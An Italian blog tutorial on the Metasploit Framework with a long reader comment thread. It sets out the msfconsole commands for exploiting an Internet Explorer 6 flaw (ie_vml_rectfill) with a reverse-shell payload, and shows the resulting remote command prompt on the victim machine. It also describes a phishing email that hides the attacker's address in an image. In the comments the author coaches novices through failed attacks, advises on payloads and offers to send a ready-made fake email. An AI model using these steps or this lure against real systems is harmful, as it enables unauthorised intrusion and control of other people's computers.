Metasploit Framework

resource.png

 

Ciao a tutti,

eccoci arrivati alla descrizione di uno strumento che ha praticamente rivoluzionato il mondo della sicurezza informatica , stiamo parlando del progetto “MetaSploitFramework“.

Partiamo però dalla teoria , in modo che tutti possano rendersi conto di quello che sto per descrivervi…

Cos’é il progetto Metasploit?

Metasploit è un progetto nato dall’ unione di più persone appassionate di informatica , di sicurezza e di programmazione , che si sono dedicate a questo progetto per fare in modo che tutti gli amministratori di siti , di interi network , e di importanti o meno portali informatici , possano , tramite l’ uso del framework , proteggersi da malintenzionati , che in un mondo come quello dell’informatica , non mancano mai.

Tramite il progetto metasploit framework , tutti gli amministratori di reti , possono utilizzare e scrivere exploits e shellcode , (o payloads) , e testare facilmente la loro sicurezza in modo da rendersi conto o meno dei vari rischi che possono affliggere le loro reti/applicazioni.

Metasploit framework , vuole quindi essere un progetto che , tramite nuove tecniche di exploit , mira al rafforzamento della sicurezza informatica in generale , fornendo a tutti , nuovi e facilitati strumenti per il pentesting , utilizzabili da chiunque e soprattutto opensource.

Da quello che ho appena detto è facile intendere che se un amministratore si tiene aggiornato tramite questo framework , sarà difficile incappare in scriptkiddies e malintenzionati vari.

Gli strumenti forniti dall’ intero framework sono molti , basta recarsi a questa pagina per vederli tutti , noi naturalmente useremo gli strumenti inseriti in backtrack.

Sottolineare la questione opensource è fondamentale per comprendere il progetto MSF , per il semplice fatto non è l’ unico strumento di questo tipo , ma essendo l’unico opensource , è secondo me , l’unico degno di nota.

Tramite la raccolta , sempre aggiornata di exploit , MSF fornisce uno strumento eccezionale e che , essendo opensource , può arrivare alle porte di tutti gli ineterssati , e data la sua importanza ed efficacia , non poteva mancare in una security-distro come la backtrack , che infatti fornisce di default MSF in tutte le versioni , fin dalla nascita del progetto.

Metasploitframework fornisce una vasta gamma di exploit , che possono sfruttare vulnerabilità che affliggono reti , con tutti i vari tipi di protocolli dal SAMBA alle VPN, database basati su MySQL fino agli Oracle , server Microsoft come anche Apache , Pc che girano con Windows (tutte le versioni di Windows dalla 95 all’ XP) , come anche UNIX Solaris e LINUX , e tantissime applicazioni , dai browser come Firefox fino ad arrivare a Internet Explorer , da RealVNC fino al messanger di Yahoo ; insomma Metasploitframework è un grande progetto che se ben usufruito può dare risultati di protezione eccezionali. I più assidui lettori di advertising e securitynews , già si vedono arrivare advertising con relativi exploits per il pentesting della propria rete , usufruibile appunto tramite il framework Metasploit.

MSF è utilizzabile da diveri O.S. , dai sistemi basati su GNU/Linux , fino ad arrivare a BSD e Windows (quì vi segnalo per coloro che usano sistemi Microsoft una buona guida ) , e parlo sia tramite Shell , (o prompt per gli utenti Windows) , fino all’ utilizzo dell’ interfaccia grafica tramite interprete e librerie Ruby installate.

Nella backtrack attualmente , sono fornite due versioni del progetto MSF , la versione 2 e la 3.

La versione 2 è stata attualmente abbandonata , per far posto alla versione 3 , ma vediamo un pò più da vicino quello che può essere l’ utilizzo del framework.

Innanzitutto voglio dire che la disponibilità degli amministratori di MSF , fornisce a tutti gli strumenti per comprendere il funzionamento del loro progetto , ci sono sul sito ufficiale di MSF tutti gli strumenti necessari per utilizzare il MSF che agli utenti , di backtrack e non , si presenta in 4 maniere di diverso utilizzo :

La MSFconsole , che fornisce appunto l’utilizzo del framework tramite konsole-Terminale-Shell , chiamatela come volete , e che secondo me , data la sua logica e stabilità , è la migliore soluzione , e devo dire che l’impostazione è anche avvastanza userfriendly.

Il MSFweb , che fornisce a tutti coloro che hanno problemi di adeguamento a konsole e terminali , uno strumento tramite interfaccia web , che può per alcuni risultare più familiare , e che è raggiungibile sulla porta 55555 del proprio localhost , praticamente all’indirizzo http://127.0.0.1/55555/

Il MSFgui , ovvero il MSF con interfaccia grafica , (attualmente non utilizzabile in backtrack3beta per la mancanza di librerie , la gnome-gtk2 a me ha dato problemi e non sono riuscito ad avviare MSF anche con interprete Ruby e altre librerie installate).

Il MSFcli , ovvero l’utilizzo di Metasploitframework in modalità konsole , senza l’interattività che invece ha MSFconsole , ma che permette di inviare l’exploit tramite il comando in una sola riga.

Va detto che in backtrack sono inseriti di default altri tools che hanno un metodo di lavoro che usufruisce del Metasploitframework , come Fast-Track e l’ Autopowning , oppure come il nuovo progetto blue-track , ma sono secondo me argomenti che vanno trattati singolarmente e dopo la totale comprensione di MSF.

 

metasploit_logos_main.gif

Come funziona un attacco con Metasploitframework?

L’ attacco tramite il MetaSloitFramework , va eseguito effettuando una serie di passi ,(quì una DEMO online ) che sono:

1) – Individuazione del sistema vittima tramite scansione e relativa scelta e scansione dell’ exploit per la vulnerabilità individuata.

2) – Scelta e configurazione del payload (o shellcode) , da eseguire dopo l’ eventuale successo ottenuto dall’ exploit.

3) – Exploitation , invio dell’ exploit.

Questi sono i processi fondamentali da eseguire , ma non gli unici , comunque vediamoli singolarmente.

L’ individuazione del sistema vittima viene eseguita naturalmente tramite vari strumenti , uno di questi può essere ad esempio uno scanner , e quale scanner più potente , leggero e dettagliato , da inserire all’ interno di un framework se non l’ nmap.

L’ nMap è inserito all’ interno di MSF , e può essere facilmente richiamato tramite il comando nmap , e vedremo che subito ci verranno elencate tutte le opzioni dello scanning , che è solo uno dei tool usufruibili nel framework metasploit.

Una volta individuato il sistema vittima , con tutte le applicazioni e vulnerabilità annesse , bisogna scegliere un exploit.

******************

I tutorial che vengono pubblicati su questo blog , (speriamo di poterlo chiamare presto sito…) , sono tutti testati , e siccome è stato fatto da noi un video a riguardo di un attacco con l’ utilizzo del Metasploitframework , baserò questo articolo/Tutorial sul video che abbiamo fatto , e che potete trovare naturalmente nell’ apposita sezione dei video.

******************

Per lavorare e provare il Metasploitframework , ho selezionato il Framework versione 2 , da:

KDEmenu–>backtrack—>Penetration–>Metasploit Exploitation Framework–>Framework Version 2–>MSFconsole
Per scegliere l’ exploit , ho eseguito il comando che mostra tutti gli exploit disponibili , show exploits.

Riporto solo alcuni screenshots per comodità di spazio…

msf-2.pngmsf-2.pngmsf-3.pngmsf-4.png

Quì ho scelto di usare l’ exploit:“ie_vml_rectfill” , questo , già dal codice , è un exploit che sfrutta una vulnerbilità insita in Internet Explorer alla versione 6 , e che permette all’ attaccante di eseguire del codice sul host della vittima.

un exploit , dopo la scelta , deve essere inserito e configurato , e viene fatta questa operazione tramite il comando use , e come configurazione visto che ogni exploit vuole una configurazione diversa , per farla ho digitato il comando show options , il quale mostra tutte le opzioni necessarie all’ uso dell’ exploit selezionato , e gli obbiettivi/target , a cui l’ exploit può far capo con successo.

il comando che ho dato quindi è (rosso-comando-sistema / nero-comando-utente):

msf > use ie_vml_rectfill

dopodiché per vedere le opzioni di cui l’exploit necessita ho dato il comando show options:

msf ie_vml_rectfill > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST XX.XXX.X.XX Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

msf ie_vml_rectfill(win32_reverse) >

*********************

Apro una piccola parentesi per dire che in ogni momento è possibile richiamare tramite alcuni comandi la lista disponibile di nops , encoders , exploits e di comandi disponibili tramite il comando help.

msf-7.pngmsf-8.pngmsf-7.png

(gli exploits sono stati riportati negli screenshots precedenti…)

***********

Per scegliere il payload diamo il seuente comando:

msf ie_vml_rectfill(win32_reverse) > show payloads

Metasploit Framework Usable Payloads
====================================

win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

Questi i payloads disponibili , e da questi non dobbiamo fare altro che selezionarne uno e vedere se necessita di configurazione , quindi con il comando seguente selezioniamo per il nostro attacco il payload: win32_exec , il quale ci consentirà l’esecuzione di comandi tramite il prompt Windows Xp , che è il sistema attaccato.

msf ie_vml_rectfill > set PAYLOAD win32_reverse

una volta eseguita la selezione del payload , come per l’ exploit vediamo le opzioni di cui necessita , diamo quindi il solito comando show option , ottenendo il risultato seguente:

msf ie_vml_rectfill(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST 29.230.6.74 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

Le opzioni de default non vanno bene per il payload che abbiamo selezionato , visto , come ripeto , che è la vittima a connettersi al nostro fake server , allora devo dargli l’indirizzo su cui la vittima si connette e noi riceviamo la sua connessione e lo facciamo con il seguente comando:

msf ie_vml_rectfill(win32_reverse) > set HTTPHOST 29.XXX.6.XX

HTTPHOST -> 29.XXX.6.XX

Ora basta dare il comando exploit ,(colore-blue-prompt-vittima), e guardate voi il risultato ottenuto , (gli IP sono stati mascherti con delle “X”):

msf ie_vml_rectfill(win32_reverse) > exploit


[*] Starting Reverse Handler.
[*] Waiting for connections to http://29.XXX.X.XX:8080/
[*] Client connected from 1.42.XXX.XX:1042…
[*] Got connection from 29.XXX.6.XX:4321 <-> 1.42.XXX.XX:1043

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>

***

metasploit_logos_icbm1.jpg
***

Ed ecco nelle nostre mani il totale controllo del sistema della vittima.

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>exit

exit è stato il comando che io ho dato , perché stiamo facendo un test , ma pensate voi un malintenzionato cosa potrebbe arrivare a fare…

***

Ecco quindi a cosa serve il metasploitframework… …a rendersi immuni da attacchi di malintenzionati , la vittima del nostro attacco infatti , una volta che è venuto a conoscenza della falla di IE-6 , potrebbe benissimo pensare di passare a IE-7 , rendendosi così immune dall’ attacco con l’ exploit che abbiamo scelto in questo tutorial.

Il metasploitframework , è quindi un progetto grandioso , basta farne buon uso. I metodi di attacco a seconda della vittima e dell’ exploit sono molteplici , io al posto di usufruire del payload win32_reverse , avrei potuto ad esempio richiamare il payload win32_reverse_vncinject in questo caso avrei potuto anche ottenere il controllo grafico del sistema della vittima , tramite appunto l’ iniezione del payload di un VNC control , il programma per gestire da remoto un desktop , che però in questo caso sarebbe stato non autorizzato logicamente.

***

Non dobbiamo dimenticare una cosa però , che nel nostro caso è di fondamentale importanza , e cioé la connessione in un host “fake” del sistema vittma , praticamente c’é stata dopo l’ analisi dell’ attacco e la decisione di usare l’ exploit win32_reverse , la decisione di creare una fakemail , che conteneva l’ indirizzo IP dell’ host fake nascosto in un immagine che ha fatto in modo che la vittima si sia connessa al server fake , sul quale poi noi abbiamo ricevuto la connessione della vittima.

L’IP host fake , è stato inserito nella configurazione del exploit con il comando:

msf ie_vml_rectfill(win32_reverse) > set LHOST 29.XXX.6.XX

in questo modo abbiamo ricevuto la connessione , e ci siamo impadroniti del sistema vittima.

***

Come possiamo vedere dagli screenshots che ho fatto gli exploits , i payloads , e le altre istruzioni all’ interno della konsole , ma anche se siha intenzione di usare MSFweb o la gui con MSFgui , sono inserite in modo da essere facilmente riconoscibili…. questo per rendere l’ idea è uno screenshot realizzato per l’ uso di MSFweb.:

msf-11.png

 

msf-12.png

uesto della webinterface però è un uso che consiglio esclusivamente a coloro che devono familiarizzare con il progetto oppure con Shell e konsole , perché altrimenti è facile capire che la prestazione è meno performante.

***

Come possiamo vedere exploits e payloads sono inseriti in stile “exploit – applicazione affetta da vulnerabilità e causa

Infatti se prendiamo il caso da noi analizzato e sfruttato per l’ attacco , possiamo vedere che:

ie_vml_rectfill Internet Explorer VML Fill Method Code Execution

Infatti:

Nome dell’ exploit : ie_vml_rectfill

Applicazione affetta : Internet Explorer

Causa : VML Fill Method Code Execution

Per vedere una scheda più completa riguardante gli exploits di cui possiamo servirci , possiamo sempre connetterci al sito del progetto ed avere così una conoscenza più dettagliata.

Sempre per il nostro caso a questa pagina ci sono tutti i dettagli , anche se non dobbiamo dimenticare che in backtrack è inserito , ma il framework alla versione 2 non è più supportato , quindi non può essere più effettuato nessun UPdate , cosa che deve essere sempre eseguita prima di ogni test , in modo da avere a disposizione tutti gli exploits più nuovi e di sonseguenza più efficaci.

La cosa importante da capire è che digitando il nome dell’ exploit nel motore di ricerca si ottiene come risultato la scheda tecnica dello stesso , e possiamo analizzarlo in tutte le sue caratteristiche , anche per il fatto che dalla pagina dell’ exploit nella scheda del progetto ci sono anche delle referenze a siti esterni come milw0rm e SecurityFocus ,che contegono inoltre anche i link per le rispettive patch.

MetasploitFramework è un progetto troppo grande per essere trattao unicamente in un articolo/tutorial , ed è per questo che abbiamo realizzato un videotutorial e che non sarà l’ unico , anche se tratteremo prossimamente nuovi argomenti importanti , ogni qualvolta che uscirà una qualche novità rispetto al framework saremo lieti di darla e testarla.

All’ interno del nostro BOX , inseriremo tutti i testi possibili per la comprensione di questo stupendo progetto , alcuni saranno anche nostri , ma la maggiorparte provengono come è logico che sia dal sito del progetto Metasploit , che personalmente tengo e consiglio di tenere sott’ occhio.

ciao a tutti e alla prossima.

 

37 commenti

  1. ciao ho seguito la procedura..,con lo scopo di penetrare nel mio secondo pc di casa..,ma quando eseguo i passi set LHOST XX.XXX.X.XX e successivamente do il cmd exploit,ottengo il seguente risultato: failed to create local HTTP listener to port 8080,cosa posso aver sbagliato?scusate ma sono alle prime armi🙂

  2. Ciao Marcello e benvenuto ,

    ti prego di non scrivere indirizzi IP di server altrui , altrimenti si rischia di cadere nell’ illegalità… ….e qusto noi non lo vogliamo ok?

    Ora , se vuoi veramente capire il processo devi leggerti qualcosina , altrimenti fai capire che vuoi solo entrare nell’ “altro” pc , senza però aver ben capito cosa stai facendo….

    l’ indirizzo IP che hai scritto , e ti prego di non farlo più , è di un server particolare , che io personalmente uso come fakeserver (server fasullo) , per i miei esperimenti , ma tu se vuoi puoi inserirci l’ IP del tuo computer , inserisci il tuo IP in pratica e una volta settato a dovere vedrai che l’ Exploit funzionerà.

    l’IP che ti chiede il sistema , e che tu inserisci , è quello in cui tu dici al sistema di voler ricevere la connessione , tramite la quale controllerai poi da remoto il sistema della vittima.

    se gli metti l’IP sbagliato la connessione non la riceverai mai capisci?

    metti il tuo IP e facci sapere…

    ciao

  3. ti preciso inoltre che una volta lanciato l’ exploit , devi fare in modo che il pc della vittima si connetta al tuo fakeserver che nel tuo caso sarà l’ indirizzo IP del tuo pc , quindi solo per prova , vai (con il pc della vittima) , con internet explorer all’ indirizzo “http://tuo.indir.izzo.ip:8080/” , e da allora soltanto riceverai la connessione del sistema vittima.

    in pratica , e questo l’ ho scritto ma tu evidentemente non lo hai letto , c’é una procedura che va fatta prima dell’ exploitation , che sarebbe l’ invio di una mail fasulla , fakemail , e che fà in modo che la vittima clicchi ad esempio su di un immagine che racchiuse l’ indirizzo IP dove tu riceverai la connessione.

    ancora ciao.

  4. ciao grazie per avermi risposto🙂 ,mi scuso per l’inidirzzo ip inserito..,si non avevo fatto la fakemail(come posso farla?scusa ma essendo ancora giovane..non so moltissimo..sto cercando di imparare come funzionano le cose🙂 )per la precisione cmq uso windows vista..con installata la vmware dove ho la backtrack 3.posso chiedere altri consigli se ne ho bisogno?ora provo a correggwre gli erroti che tu mi hai segnalato

  5. se devi fare solo delle prove la fakemail non ti serve…

    solo che quando lanci l’ exploit , devi fare in modo che il sistema vittima (che deve essere un windows Xp fino al sp2) , vada con internet explorer all’ indirizzo IP del tuo pc , alla porta 8080 , quindi se il tuo IP è 12.12.12.12 , con IE dell’xp vittima devi andare a http://12.12.12.12:8080/ e dopo 1/2 secondi riceverai sul tuo pc la connessione e potrai controllare il sistema vittima.

  6. […] & WIFIZoo updateHacking windows password with BackTrack & Rainbow TablesMetasploitFrameworkDmitryWPA CrackingInstallazione e configurazione di Nessus in BackTrack“install VMware on […]

  7. ah ecco ho capito,ma nel tal caso voglia fare la prova anche della fakemail..inserendo un immagine che contenga il mio indirizzo ip?c’è qualche guida per questo?
    ps:a me interessa solo sapere..non entrsre nei pc degli altri per frugarli..non mi interessa

  8. guarda marcello….

    se vuoi ti bsta un pò di fantasia , altrimenti per le fakemail c’é da studiare almeno un pò di php , oppure io personalmente spesso ho usato il protocollo telnet , rapido semplice e veloce , ora in backtrack i tool di enumerazione anche sono molti e le fakemail le uso spesso insiseme agli stessi , ma per la costruzione di una fakemail c’é da programmare un pò…niente di complicato , ma neanche di così facile ecco…

    se vuoi lasciami la mail e te ne invio una di mia costruzione , un pò vecchiotta ma ancora efficace.

    altrimenti mper guide ed altro , ti basta google…

    …ciao.

  9. Ciao, io avrei un problema con metaslpoit.
    Ho seguito la tua guida, ho provato a fare da me con la versione 3 ma in tutti i casi ottengo sempre il solito risultato: metaslpoit sembra “bloccarsi”.
    anche con la versione 3 e exploit diversi il risultato è il seguente:

    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://29.XXX.X.XX:8080/
    [*] Client connected from 1.42.XXX.XX:1042…
    [*] Got connection from 29.XXX.6.XX:4321 1.42.XXX.XX:1043

    e poi non succede più niente.
    nel caso del vncinjection dice Starting local TCP relay on 127.0.0.1:5900 e resta li, mentre in altri video che ho visto (tra cui uno qui) parte subito dopo…
    a cosa pensi che sia dovuto questo errore? io navigo nel buio… spero in un tuo suggerimento, grazie mille

  10. ciao Alberto….
    devi essere più preciso a riguardo altrimenti non riesco ad aiutarti…

    1)La vulnerabilità qual’è?
    2)Il sistema operativo vittima qul’é?
    3)L’exploit che vuoi usare qual’é?
    4)l’ IP del sistema vittima si connette al tuo IP , (o all’ IP del fakeserver) , quando tu hai la sessione di exploit aperta?

    per il payload vediamo dopo che mi hai fornito di queste informazioni….

    …ciao.

  11. se non riesci a risolvere prova ad entrare in canale , troverai qualcuno che ti aiuta…..

    ciao.

  12. ho provato seguendo la tua guida, quella qui sopra.
    cmq
    1)CreateObject di Internet Explorer
    2)windows xp sp2 con gli ultimi aggiornamenti
    3) windows/browser/ie_createobject -> windows/vncinject/reverse_tcp
    4)faccio partire l’exploit dal pc con backtrack, poi con quello vittima mi collego (tramite internet explorer) all’indirizzo ip del pc con backtrack.
    backtrack si accorige della connessione, manda il server, prova a connettersi e dà l’errore “not a valid server”.
    Nel frattempo sul pc vittima, dentro explorer la pagina aperta (quella con l’IP del pc con BT) si riempie caratteri, probabilmente stampa a video i dati che gli arrivano.
    stessa identica cosa con qualunque expoit provi (della categoria browser) e qualunque payload provi.
    Magari è l’exploit che non funziona (non sono vurnerabile) ma non riesco a trovare un exploit con cui abbia una minima possibilità di fare un test

  13. ciao Alberto….
    già va meglio , comunque…

    fossi in te , andrei sul sito di metasploitframework , in questi casi è l’ unico che serve , e mi leggerei le schede tecniche degli exploit.

    in questo modo puoi vedere subito le vulnerabilità presenti nel tuo sistema , quello con l’ Xp praticamente…

    l’exploit che io ho usato nella guida , funziona con Xp con Sp2 , ma con l’ Xp-corporate non funziona , il corporate sarebbe il sp2 uguale ma è quello che praticamente non necesita di serial number durante l’installazione e comunque se hai fatto , come tu stesso hai detto , gli ultimi aggiornamenti , significa che il tuo sistema vittima è patchato.

    Nella guida ci sono i link a metasploit , l’unica è guardarsi le schede tecniche e vedere se il tuo pc con Xp è ancora affetto a qualche vulnerabilità.

    comunque per fare ancora delle prove , usa payload più leggeri tipo una shell reverse , oppure un meterpreter , il VNC-Inject molte volte può essere bloccato , credo che il tuo sistema abbia ancora delle vulnerabilità altrimenti IE-6 non ti stampa nulla a video quando si connette all’ IP:8080 del sistema con bt.

    ciao.

  14. Ciao! Complimenti per il tutorial! Molto interessante, al momento, avendolo appena letto (e essendo in ufficio!) non ho provato nulla, ma avrei un paio di domandine che mi ronzano per la testa.

    1) Cosa avete usato per fake server? Avete creato qualcosa in uno spazio WEB gratuito (tipo Altervista) o avete usato un altro PC della vostra LAN come fake server?
    2) Per la fake mail, ok mandare una fake mail, ma non mi è chiaro come avete associato un indirizzo IP ad una immagine. Forse non ho capito bene, avete inviato un file JPEG e cliccando su quello si apre IE e si collega all’indirizzo nascosto nel file JPEG? In tal caso, come avete fatto a fare ciò?

    Grazie e complimenti ancora!

  15. OK, molte grazie ^^
    il mio dubbio era proprio come interpretare l’esito dei test che avevo eseguito.
    cmq nemmeno la shell reverse funziona, mentre il meterpreter si ma non so come si usa ^^
    ancora grazie alla prossima!

  16. Alberto , se funziona il meterpreter dovrebbe darti esito positivo anche la revers_shell in TCP , sei sicuro di aver usato lo stesso exploit per entrambe i payloads?

    detto questo il meterpreter ha diverse funzionalità , è come un server a tua completa disposizione , cercando un pò su google puoi fare tutto…. …..se vuoi fare qualcosina “al volo” puoi guardarti il video che ho messo per ultimo proprio usando anche il meterpreter , scaricalo e guardalo così potrai capire di più……
    …ciao.

  17. @hack4ever,
    ciao e benvenuto….

    per fakeserver si intnde come sempre un IP a cui tu sei abilitato a ricevere la connessione , quindi da un server pubblico fino all’ IP di una LAN , io l’ ho fatto una volta in LAN , ultimo video , e la penultima volta tramite un fakeserver vero e proprio , intendendo esterno alla mia lan e non mio , (anche se autorizzato ovviamente).

    per quanto riguarda la fakemail , non è necessaria se si fanno delle prove soltanto , nel senso che se si è al corrente che il sistema vittima apra la sua posta elettronica con un client come ad esempio M$outlook allora al 90% dei casi se si nasconde l’ IP in un’ immagine *.jpg o altro formato , appena l’utente cliccherà sull’ immagine , (o su un link con un altro testo per indenderci) , si aprira Internet Explorer puntando diretto sull’ IP a cui tu ricevi connessione , e anche se poi lui chiuderà IE tu avrai ricevuto la connessione e tramite il payload che scegli puoi fare ciò che ti serve.

    la fakemail serve solo nel caso in cui tu stia facendo un vero e proprio attacco e sai che l’utente del sistema vittima non cascherebbe al cliccare sull’ immagine , ma a questo punto dubito anche che caschi alla fakemail che contiene un portale o altro…

    ciao.

  18. nel nostro caso avendo usato un exploit che sfrutta una vulnerabilità in IE-6 , l’ importante è che il browser predefinito sia appunto IE-6.

    altrimenti ci sono altri exploits , ma questi richiedono naturalmente altre vulnerabilità da sfruttare…

    ancora ciao.

  19. Grazie a entrambi per le risposte, ciò che avete espresso è chiaro, ma non ho ancora compreso come fare FISICAMENTE a inserire un link (l’indirizzo IP) all’interno di una immagine JPEG.

    In passato ho fatto numerose prove per riuscire a unire un file di immagine con un file eseguibile ecc… ma poi cliccando sull’immagine si apre quest’ultima ma il file annesso non fa nulla, viceversa unendo un eseguibile con una immagine ricavandone un .exe, al doppio click parte l’eseguibile e viene stampata a video l’immagine.

    Ecco, quello che non capisco è come fate a nascondere un link in un JPEG in modo che ad un utente compaia una immagine e cliccandoci sopra, oltre a visualizzare l’immagine avvii il browser facendolo connettere all’indirizzo del link.

    Logicamente prima di un attacco, cosa che non farei dato che tanto provo nella mia LAN, occorre effettuare diversi scan con ad esempi NMAP in modo da conoscere il sistema “vittima”. Quando ho tempo, e risolvo i problemi con il router faccio qualche prova in locale.

    Grazie ancora!

  20. Devi capire che la maggiorparte delle volte basta fare le cose che ti vengono in mente per prima…. …..esempio , troppe volte io mi sono messo a capire cose partendo dall’ eventuale soluzione più difficile , invece basta aprire gli occhi un secondo , retrocedere con la mente anche se non è facile , aprire il thunderbird , ( solo per fare un esempio ) , e inserire un collegamento insieme ad un immagine…come?

    inserisci l’ immagine , la tieni selezionata e inserisci il collegamento.

    se poi vuoi fare tramite una piccola fakemail puoi ad esempio usare il protocollo telnet , gira su google e vedrai che troverai tute le risposte necessarie…

    …ciao

  21. Ciao, ho un problema con metasploit..
    ho seguito la tua guida passo-passo (quella dell exploit ie_vml_rectfill) ma quando avvio l exploit mi dà questo errore:
    [*] Starting Reverse Handler.
    [-] Failed to create local HTTP listener on 8080
    [*] Exiting Reverse Handler.

    Non riesco a capire cosa sia.. potresti aiutarmi..?
    La prova la sto facendo nella mia LAN..

  22. ciao gianluca e benvenuto….
    vorrei aiutarti ma devi fornirmi di più informazioni altrimenti io non posso sapere capisci?

    sembra che l’ exploit si fermi a causa di setting su localhost , cosa hai inserito come LHOST ????

    una volta lanciato l’exploit , quanto tempo passa prima che tu riceva l’ errore della connessione che hai scritto?

    ciao.

    nel caso vai quì ed entra in chan.

    https://carlitobrigante.wordpress.com/2008/01/04/la-chat-di-backtrackblog/

  23. se vuoi manda una mail alla nostra mailinglist l’indirizzo è nel link che ti ho scritto….

    …ciao.

  24. Come localhost metto l’ indirizzo del mio computer..

    facendo alcune prove se lascio HTTPHOST di default non mi da questo errore ma si blocca ad aspettare la connessione, mentre se metto l’ indirizzo del computer da attaccare mi da l’ errore..

    L’ errore lo ricevo quasi immediatamente..

    Come HTTPHOST devo mettere l’ indirizzo dove ricevo la connessione cioè l’ indirizzo del mio pc mentre come LHOST devo mettere l’indirizzo dove si deve connettere il pc vittima (che sarebbe sempre quello del mio pc) giusto..?

    Ieri guardando sul sito di metasploit ho notato che win98 non è indicato nè nei payload ke nè negli exploit.. siccome nel pc vittima ho win98 non è che potrebbe essere questo il problema..?

    grazie delle risposte e del lavoro ke svolgi per tutti..!!🙂

  25. […] hanno dato risultati ben diversi , e per effettuare , giusto per fare un esempio , un attacco con il framework Metasploit , possiamo vedere l’ importanza dell’ opzione -O da aggiungere alla riga dell’ nMap , che ci […]

  26. complimenti per la guida,una delle più chiare che ho trovato in rete.
    Qualcuno potrebbe aiutarmi nel capire meglio le fasi precedenti all’utilizzo di metasploit?
    Ho letto anche la guida di nmap\amap ma ho questo dubbio, una volta rilevato porte e servizi presenti in base a cosa scelgo l’exploit ed il payload? forse la domanda è banale,ma non capisco, es: rilevo in rete un win xp con aperte le porte 445-139 e magari 80 xchè ha attivato IIS come scelgo l’exploit? ed il payload ha qualche legame con l’exploit scelto?
    grazie in anticipo e ancora complmenti per il vostro lavoro

  27. ogni exploit è scritto appositamente per poter sfruttare una determinata vulnerabilità , che a sua volta può risiedere o in un’ applicazione o in un insieme di servizi , come per l’ appunto IIS.

    se devi usare metasploit come ogni altro exploit , non devi orientarti sulle porte aperte , ma sulle applicazioni che vi sono sul sistema da attaccare.

    se le applicazioni che vi girano , (come nel caso del mio video , InternetExplorer-6) , sono vulnerabili allora si vede se c’é all’ interno del progetto Metasploit un exploit che può sfruttare la vulnerabilità presente.

    i payload sono a seconda della propria volontà… …se comunque hai una connessione potente , sia tu che il sistem vittima , potresti a limite anche scegliere il reverse_VNC_Inject , ma se hai una connessione non molto potente , vai con una shell_reverse_tcp e sei tranquillo in ogni caso.

    ciao.

  28. Non so se vi rendete conto della potenza di questo tool……

  29. Salve a tutti,
    vorrei sapere se questa guida funziona solo per una lan per far connettere il client con fakeserver o funziona anche tramite una connessione internet?

    Grazie,
    saluto tutti!

  30. è la domanda che è totalmente fuori , dove leggi nella guida che ci si trova all’ interno di una LAN ?

    le domande in canale o in mailinglist , non quì.

    https://carlitobrigante.wordpress.com/2008/01/04/il-chan-del-backtrackblog/

  31. scusa, ma per server fake cosa intendi ,che devo creare un server con il mio pc. se’ e si l’ho posso creare con xampp …se no ,mi spieghi meglio sto fake server come creare..GRAZIE

    • intendo che o metti il tuo IP oppure quello di un server dove tu puoi ricevere la connessione…

  32. ok…allora il mio ip ….ho provato a fare una prova con 2 pc …Il quale su 1 c’e’ windows con sp2 e I.E 6 …sul secondo pc , che e un portatile con una connessione da una chiavetta della 3ita ..quando dal primo pc scrivi nel url :10.114.x.x.x:8080/ sul secondo pc nn succede niente…e sul primo mi esce scritto Indirizzo non trovato….come mai….
    GRAZIE…

  33. […] A testimonia della leggerezza e affidabilità dell’ nMap è già il fatto che lo stesso è inserito , proprio perché leggero , all’interno di altri programmi che necessitano di scanning , come ad esempio il Metasploit Framework. […]

  34. Raga ma per caso c’è un modo per non far stampare a video da terminale gli IP vittima di un range che trova? Perchè ho notato che se si scanna un range di ip abbastanza lungo tipo 255 ip quando finisce la scansione tramite nmap l’applicazione crasha xkè giustamente deve stampare 255 ip! Attendo il vostro aiuto! Grazie!

  35. Ciao fantastiche guide e fantastico blog/sito ihih =) è molto utile x me che sono alle prime armi, voglio imparare bene a bucare, anche se nn voglio fare danni solo x esplorare, mi piacerebbe un sacco. grazie x quello che fai brigante e grazie anche al tu staff meraviglioso!!!


Comments RSS TrackBack Identifier URI

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...